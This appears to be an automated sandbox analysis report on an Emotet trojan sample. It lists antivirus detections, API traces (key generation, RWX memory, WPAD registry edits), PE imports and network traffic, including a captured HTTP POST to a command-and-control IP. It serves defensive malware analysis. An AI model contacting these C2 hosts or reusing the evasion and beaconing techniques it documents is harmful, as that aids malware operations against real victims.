6.8
High risk

1b471c6ee1860a313930b80ee3bf37d544de4d5b743636301676388263dcc203

b685f589ef7c9a9007a387e9afbb4f99.exe

Analysis duration

76s

Latest analysis

File size

496.1KB
Static detection / Dynamic detection tags: 100% 3U+TXQ8NMC0 AI SCORE=100 BSCOPE CLASSIC CONFIDENCE ELDORADO EMOTET GDBP GENCIRC GENERICKDZ GENERICRI GENETIC HFVU HFYVF HIGH CONFIDENCE HTQMJJ KRYPTIK MALWARE@#XR3CP6QM79VS MULDROP R + TROJ R350034 S15761361 SCORE VZZZ2W
Hawkeye engine
Not detected: no Hawkeye engine detection results available
Static verdict
Antivirus engines
Engine Result Detection date Engine version
McAfee Emotet-FRZ!B685F589EF7C 20201023 6.0.6.653
Alibaba Trojan:Win32/Emotet.1b77c357 20190527 0.3.0.5
Tencent Malware.Win32.Gencirc.10cdfc46 20201023 1.0.0.1
Kingsoft 20201023 2013.8.14.323
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computer name (1 event)
Time & API Arguments Status Return Repeated
1619861137.826531
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 events)
Time & API Arguments Status Return Repeated
1619861122.795531
CryptGenKey
crypto_handle: 0x006bfed8
algorithm_identifier: 0x0000660e ()
provider_handle: 0x005f57f8
flags: 1
key: fâ·F>c6¼Æ×‡ãÁ{( Z
success 1 0
1619861137.842531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤‰è,yр¶LÁMÔ0¾2LãËÆÔ;Yšò._C\L¼p¢á£dоÿ_‡yþGx¸I¢sP³æZçïÐf› ÁG–q¸µŒéO¹‚8¸£²Að
blob_type: 1
flags: 64
success 1 0
1619861172.529531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤ÁS‡ôªó$fëšb¯ôŸc.±ÝuÿhE‹"ÌfçZ$ öeê©RçM׍ÚGsã({ C^ Þøï‘v­Ó&éüYƒ5Ä9EWÇÂïNK ½Øþ9ò’–už
blob_type: 1
flags: 64
success 1 0
1619861177.607531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤zr<’×ÀxÖ¶µuíҝ~¹àüù‘¥–„­N³P"uÇž´6s=†›Òä­VØï.ûcº‹rL8|ÖXЦ…ó|ñ@”Ø‘q.nLŸŒd¢m¢&„ÛBRUé0*'Ý¢
blob_type: 1
flags: 64
success 1 0
1619861180.404531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤m›å×ô«HÉ ¿)%`üÏÌwZ ¬fÀ˜lŸ ýǧÆtj„‹HÆs”mƒ >œà¦ŒÃl*l !J…²¶#–?) ú59SuŒ™”ˆ¶‰²°5\ÅõË\Zu¶
blob_type: 1
flags: 64
success 1 0
1619861185.092531
CryptExportKey
crypto_handle: 0x006bfed8
crypto_export_handle: 0x006bfe98
buffer: f¤õ!^PŸ¥ +ÐАÚMèHÁ9VLvëkq[Ë%FÈ;°¢ÁŽve„ž‡œVSžýZ9 ÿOaeþxéËk6ÑÔÔ y:óÔ+¼Ÿ ¯Í uVG×±Ioz
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 event)
packer Armadillo v1.71
The file contains an unknown PE resource name, possibly indicative of a packer (1 event)
resource name None
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (2 events)
Time & API Arguments Status Return Repeated
1619861122.061531
NtAllocateVirtualMemory
process_identifier: 368
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x003d0000
success 0 0
1619861122.107531
NtAllocateVirtualMemory
process_identifier: 368
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00590000
success 0 0
Searches running processes, potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619861138.357531
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 event)
process b685f589ef7c9a9007a387e9afbb4f99.exe
Reads the system's User-Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1619861137.998531
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with hosts for which no DNS query was performed (6 events)
host 134.209.193.138
host 162.144.42.60
host 172.105.78.244
host 172.217.24.14
host 210.1.219.238
host 68.183.233.80
Sets or modifies the WPAD proxy auto-configuration settings for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1619861140.920531
RegSetValueExA
key_handle: 0x000003b4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003b4
value:  Äœâ‹>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003b4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619861140.920531
RegSetValueExW
key_handle: 0x000003b4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003cc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003cc
value:  Äœâ‹>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619861140.920531
RegSetValueExA
key_handle: 0x000003cc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619861140.967531
RegSetValueExW
key_handle: 0x000003b0
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
File has been identified by 48 antivirus engines on VirusTotal as malicious (48 events)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69847
ClamAV Win.Dropper.Emotet-9628825-0
FireEye Trojan.GenericKDZ.69847
CAT-QuickHeal Trojan.GenericRI.S15761361
McAfee Emotet-FRZ!B685F589EF7C
Malwarebytes Trojan.MalPack.TRE
Zillya Trojan.Emotet.Win32.28063
K7AntiVirus Trojan ( 0053af701 )
Alibaba Trojan:Win32/Emotet.1b77c357
K7GW Trojan ( 0053af701 )
Cyren W32/Emotet.ARR.gen!Eldorado
Symantec Packed.Generic.554
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 90)
Kaspersky Trojan-Banker.Win32.Emotet.gdbp
BitDefender Trojan.GenericKDZ.69847
NANO-Antivirus Trojan.Win32.Emotet.htqmjj
AegisLab Trojan.Win32.Emotet.L!c
Tencent Malware.Win32.Gencirc.10cdfc46
Ad-Aware Trojan.GenericKDZ.69847
Comodo Malware@#xr3cp6qm79vs
DrWeb Trojan.Emotet.1008
VIPRE Trojan.Win32.Generic!BT
Invincea Mal/Generic-R + Troj/Emotet-CMU
McAfee-GW-Edition BehavesLike.Win32.Emotet.gh
Sophos Troj/Emotet-CMU
Jiangmin Trojan.Banker.Emotet.ogu
Avira TR/AD.Emotet.hfyvf
Antiy-AVL Trojan[Banker]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
ViRobot Trojan.Win32.Emotet.507904.E
ZoneAlarm Trojan-Banker.Win32.Emotet.gdbp
GData Win32.Trojan.PSE.VZZZ2W
TACHYON Banker/W32.Emotet.508002
AhnLab-V3 Trojan/Win32.Emotet.R350034
VBA32 BScope.Trojan.MulDrop
ALYac Trojan.Agent.Emotet
MAX malware (ai score=100)
ESET-NOD32 Win32/Emotet.CD
Rising Trojan.Kryptik!1.CB94 (CLASSIC)
Yandex Trojan.Kryptik!3U+txq8nmc0
Ikarus Trojan-Banker.Emotet
Fortinet W32/Kryptik.HFVU!tr
Panda Trj/Genetic.gen
CrowdStrike win/malicious_confidence_100% (W)
Qihoo-360 Win32/Trojan.653
Connects to IP addresses that are no longer responding to requests (legitimate services usually remain up and running) (5 events)
dead_host 192.168.56.101:49181
dead_host 162.144.42.60:8080
dead_host 210.1.219.238:80
dead_host 68.183.233.80:8080
dead_host 192.168.56.101:49183
Visual analysis
Binary image
No binary image: this sample did not generate a binary visualization image.
Runtime screenshots
No runtime screenshots: no screenshots were generated while this sample ran.

PE Compile Time

2020-09-01 14:53:22

Imports

Library KERNEL32.dll:
0x44b190 TerminateProcess
0x44b194 CreateThread
0x44b198 ExitThread
0x44b19c HeapReAlloc
0x44b1a0 HeapSize
0x44b1a4 GetACP
0x44b1ac GetSystemTime
0x44b1b0 GetLocalTime
0x44b1b4 HeapDestroy
0x44b1b8 HeapCreate
0x44b1bc VirtualFree
0x44b1c0 FatalAppExitA
0x44b1c4 IsBadWritePtr
0x44b1e0 SetHandleCount
0x44b1e4 GetStdHandle
0x44b1e8 HeapFree
0x44b1ec LCMapStringA
0x44b1f0 LCMapStringW
0x44b1f4 GetStringTypeA
0x44b1f8 GetStringTypeW
0x44b1fc Sleep
0x44b200 IsBadReadPtr
0x44b204 IsBadCodePtr
0x44b208 IsValidLocale
0x44b20c IsValidCodePage
0x44b210 GetLocaleInfoA
0x44b214 EnumSystemLocalesA
0x44b218 GetUserDefaultLCID
0x44b21c GetVersionExA
0x44b224 SetStdHandle
0x44b228 CompareStringA
0x44b22c CompareStringW
0x44b234 GetLocaleInfoW
0x44b238 GetCommandLineA
0x44b23c GetStartupInfoA
0x44b240 RaiseException
0x44b244 HeapAlloc
0x44b248 RtlUnwind
0x44b254 SetFileAttributesA
0x44b258 SetFileTime
0x44b264 GetFileTime
0x44b268 GetFileSize
0x44b26c GetFileAttributesA
0x44b270 GetShortPathNameA
0x44b274 GetThreadLocale
0x44b278 GetStringTypeExA
0x44b27c GetFullPathNameA
0x44b280 InterlockedExchange
0x44b288 FindFirstFileA
0x44b28c FindClose
0x44b290 DeleteFileA
0x44b294 MoveFileA
0x44b298 SetEndOfFile
0x44b29c UnlockFile
0x44b2a0 LockFile
0x44b2a4 FlushFileBuffers
0x44b2a8 SetFilePointer
0x44b2ac WriteFile
0x44b2b0 ReadFile
0x44b2b4 CreateFileA
0x44b2b8 GetCurrentProcess
0x44b2bc DuplicateHandle
0x44b2c0 SetErrorMode
0x44b2d4 GetOEMCP
0x44b2d8 GetCPInfo
0x44b2dc GetProcessVersion
0x44b2e0 TlsGetValue
0x44b2e4 LocalReAlloc
0x44b2e8 TlsSetValue
0x44b2f0 GlobalReAlloc
0x44b2f8 TlsFree
0x44b2fc GlobalHandle
0x44b304 TlsAlloc
0x44b30c LocalAlloc
0x44b310 SizeofResource
0x44b314 GlobalFlags
0x44b318 lstrcpynA
0x44b31c FormatMessageA
0x44b320 LocalFree
0x44b324 MulDiv
0x44b328 SetLastError
0x44b32c ExitProcess
0x44b330 CreateEventA
0x44b334 SuspendThread
0x44b338 SetThreadPriority
0x44b33c ResumeThread
0x44b340 SetEvent
0x44b344 WaitForSingleObject
0x44b348 CloseHandle
0x44b34c GetModuleFileNameA
0x44b350 GlobalAlloc
0x44b354 lstrcmpA
0x44b358 GetCurrentThread
0x44b35c MultiByteToWideChar
0x44b360 WideCharToMultiByte
0x44b36c lstrlenA
0x44b370 LoadLibraryA
0x44b374 FreeLibrary
0x44b378 GetVersion
0x44b37c lstrcatA
0x44b380 GetCurrentThreadId
0x44b384 GlobalGetAtomNameA
0x44b388 lstrcmpiA
0x44b38c GlobalAddAtomA
0x44b390 GlobalFindAtomA
0x44b394 GlobalDeleteAtom
0x44b398 lstrcpyA
0x44b39c GetModuleHandleA
0x44b3a0 GlobalLock
0x44b3a4 GlobalUnlock
0x44b3a8 GlobalFree
0x44b3ac LockResource
0x44b3b0 FindResourceA
0x44b3b4 LoadResource
0x44b3b8 VirtualAlloc
0x44b3bc GetModuleHandleW
0x44b3c0 GetProcAddress
0x44b3c4 GetLastError
0x44b3c8 GetFileType
Library USER32.dll:
0x44b3e4 ReleaseDC
0x44b3e8 CheckDlgButton
0x44b3ec CheckRadioButton
0x44b3f0 GetDlgItemInt
0x44b3f4 GetDlgItemTextA
0x44b3f8 SetDlgItemInt
0x44b3fc SetDlgItemTextA
0x44b400 IsDlgButtonChecked
0x44b404 ScrollWindowEx
0x44b408 IsDialogMessageA
0x44b40c SetWindowTextA
0x44b410 MoveWindow
0x44b414 ShowWindow
0x44b418 CharToOemA
0x44b41c OemToCharA
0x44b420 wvsprintfA
0x44b424 PostQuitMessage
0x44b428 ShowOwnedPopups
0x44b42c SetCursor
0x44b430 GetCursorPos
0x44b434 ValidateRect
0x44b438 TranslateMessage
0x44b43c GetMessageA
0x44b440 ClientToScreen
0x44b444 GetWindowDC
0x44b448 BeginPaint
0x44b44c EndPaint
0x44b450 TabbedTextOutA
0x44b454 DrawTextA
0x44b458 GrayStringA
0x44b45c InflateRect
0x44b460 GetClassNameA
0x44b464 GetDesktopWindow
0x44b468 GetDialogBaseUnits
0x44b46c LoadCursorA
0x44b470 DestroyMenu
0x44b474 LoadStringA
0x44b478 WaitMessage
0x44b480 WindowFromPoint
0x44b484 InsertMenuA
0x44b488 DeleteMenu
0x44b48c GetMenuStringA
0x44b490 SetRectEmpty
0x44b494 LoadAcceleratorsA
0x44b49c LoadMenuA
0x44b4a0 SetMenu
0x44b4a4 ReuseDDElParam
0x44b4a8 UnpackDDElParam
0x44b4ac BringWindowToTop
0x44b4b0 CharUpperA
0x44b4b4 CheckMenuItem
0x44b4b8 EnableMenuItem
0x44b4bc PostMessageA
0x44b4c0 SendDlgItemMessageA
0x44b4c4 MapWindowPoints
0x44b4c8 PeekMessageA
0x44b4cc DispatchMessageA
0x44b4d0 GetFocus
0x44b4d4 SetFocus
0x44b4d8 AdjustWindowRectEx
0x44b4dc ScreenToClient
0x44b4e0 EqualRect
0x44b4e4 DeferWindowPos
0x44b4e8 BeginDeferWindowPos
0x44b4ec EndDeferWindowPos
0x44b4f0 IsWindowVisible
0x44b4f4 ScrollWindow
0x44b4f8 GetScrollInfo
0x44b4fc SetScrollInfo
0x44b500 ShowScrollBar
0x44b504 GetScrollRange
0x44b50c GetScrollPos
0x44b510 SetScrollPos
0x44b514 GetTopWindow
0x44b518 MessageBoxA
0x44b51c IsChild
0x44b520 GetCapture
0x44b524 WinHelpA
0x44b528 wsprintfA
0x44b52c GetClassInfoA
0x44b530 RegisterClassA
0x44b534 GetMenu
0x44b538 GetMenuItemCount
0x44b53c GetSubMenu
0x44b540 GetMenuItemID
0x44b544 TrackPopupMenu
0x44b548 SetWindowPlacement
0x44b550 GetDlgCtrlID
0x44b554 GetKeyState
0x44b558 DefWindowProcA
0x44b55c CreateWindowExA
0x44b560 SetWindowsHookExA
0x44b564 CallNextHookEx
0x44b568 GetClassLongA
0x44b56c SetPropA
0x44b570 UnhookWindowsHookEx
0x44b574 GetPropA
0x44b578 CallWindowProcA
0x44b57c RemovePropA
0x44b580 GetMessageTime
0x44b584 GetMessagePos
0x44b588 GetLastActivePopup
0x44b58c GetForegroundWindow
0x44b590 SetForegroundWindow
0x44b594 GetWindow
0x44b598 SetWindowLongA
0x44b59c SetWindowPos
0x44b5a4 IntersectRect
0x44b5ac IsIconic
0x44b5b0 GetWindowPlacement
0x44b5b4 GetNextDlgTabItem
0x44b5b8 EndDialog
0x44b5bc GetActiveWindow
0x44b5c0 SetActiveWindow
0x44b5c4 IsWindow
0x44b5cc DestroyWindow
0x44b5d0 GetWindowLongA
0x44b5d4 GetDlgItem
0x44b5d8 IsWindowEnabled
0x44b5dc GetClientRect
0x44b5e0 PtInRect
0x44b5e4 ReleaseCapture
0x44b5e8 SetRect
0x44b5ec OffsetRect
0x44b5f0 GetWindowRect
0x44b5f4 GetParent
0x44b5f8 GetDC
0x44b5fc SetCapture
0x44b600 CopyRect
0x44b604 DrawFrameControl
0x44b608 LoadIconA
0x44b60c DrawStateA
0x44b610 CopyImage
0x44b614 DestroyIcon
0x44b618 DrawIconEx
0x44b61c GetSysColorBrush
0x44b620 FrameRect
0x44b624 DrawFocusRect
0x44b628 GetSystemMetrics
0x44b62c GetSysColor
0x44b630 MessageBeep
0x44b634 LoadBitmapA
0x44b638 GetMenuState
0x44b63c ModifyMenuA
0x44b640 SetScrollRange
0x44b644 SetMenuItemBitmaps
0x44b648 InvalidateRect
0x44b64c UpdateWindow
0x44b650 SendMessageA
0x44b654 EnableWindow
0x44b658 GetWindowTextA
0x44b65c UnregisterClassA
Library GDI32.dll:
0x44b04c SaveDC
0x44b050 RestoreDC
0x44b054 SelectPalette
0x44b058 SetBkMode
0x44b05c SetPolyFillMode
0x44b060 SetROP2
0x44b064 SetStretchBltMode
0x44b068 SetMapMode
0x44b06c SetViewportOrgEx
0x44b070 OffsetViewportOrgEx
0x44b074 SetViewportExtEx
0x44b078 ScaleViewportExtEx
0x44b07c SetWindowOrgEx
0x44b080 OffsetWindowOrgEx
0x44b084 SetWindowExtEx
0x44b088 ScaleWindowExtEx
0x44b08c SelectClipRgn
0x44b090 ExcludeClipRect
0x44b094 IntersectClipRect
0x44b098 OffsetClipRgn
0x44b09c MoveToEx
0x44b0a0 LineTo
0x44b0a4 SetTextAlign
0x44b0b0 SetMapperFlags
0x44b0b8 ArcTo
0x44b0bc SetArcDirection
0x44b0c0 PolyDraw
0x44b0c4 StartDocA
0x44b0c8 SetColorAdjustment
0x44b0cc PolyBezierTo
0x44b0d0 GetClipRgn
0x44b0d4 CreateRectRgn
0x44b0d8 SelectClipPath
0x44b0dc ExtSelectClipRgn
0x44b0e0 PlayMetaFileRecord
0x44b0e4 GetObjectType
0x44b0e8 EnumMetaFile
0x44b0ec PlayMetaFile
0x44b0f0 GetDeviceCaps
0x44b0f4 GetViewportExtEx
0x44b0f8 GetWindowExtEx
0x44b0fc CreatePen
0x44b100 ExtCreatePen
0x44b104 CreateSolidBrush
0x44b108 CreateHatchBrush
0x44b10c CreatePatternBrush
0x44b114 PtVisible
0x44b118 RectVisible
0x44b11c TextOutA
0x44b120 ExtTextOutA
0x44b124 Escape
0x44b128 GetMapMode
0x44b12c SetRectRgn
0x44b130 CombineRgn
0x44b134 CreateFontIndirectA
0x44b138 DPtoLP
0x44b13c GetTextMetricsA
0x44b144 PatBlt
0x44b148 CreateBitmap
0x44b14c GetObjectA
0x44b150 SetBkColor
0x44b154 SetTextColor
0x44b158 GetClipBox
0x44b15c GetDCOrgEx
0x44b160 CreateCompatibleDC
0x44b168 BitBlt
0x44b16c DeleteObject
0x44b170 DeleteDC
0x44b174 Rectangle
0x44b178 CreateFontA
0x44b180 SelectObject
0x44b184 PolylineTo
0x44b188 GetStockObject
Library comdlg32.dll:
0x44b674 GetFileTitleA
Library WINSPOOL.DRV:
0x44b664 DocumentPropertiesA
0x44b668 ClosePrinter
0x44b66c OpenPrinterA
Library ADVAPI32.dll:
0x44b000 RegDeleteKeyA
0x44b004 RegCreateKeyExA
0x44b008 RegOpenKeyExA
0x44b00c RegQueryValueExA
0x44b010 RegOpenKeyA
0x44b014 RegCloseKey
0x44b018 RegDeleteValueA
0x44b01c RegSetValueExA
Library SHELL32.dll:
0x44b3d0 DragQueryFileA
0x44b3d4 DragFinish
0x44b3d8 DragAcceptFiles
0x44b3dc SHGetFileInfoA
Library COMCTL32.dll:
0x44b024
0x44b028
0x44b02c ImageList_Create
0x44b030
0x44b038 ImageList_Merge
0x44b03c ImageList_Read
0x44b040 ImageList_Write
0x44b044 ImageList_Destroy

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49182 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/hzqgOiGW7CI/lacsl5/VkxP9i222Ga/bk422pqIF/cv6YpXaHkC/8RwckBPWv1ga/
POST /hzqgOiGW7CI/lacsl5/VkxP9i222Ga/bk422pqIF/cv6YpXaHkC/8RwckBPWv1ga/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------7ed61f246bb6fe7b26f32a9b3593fcd8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.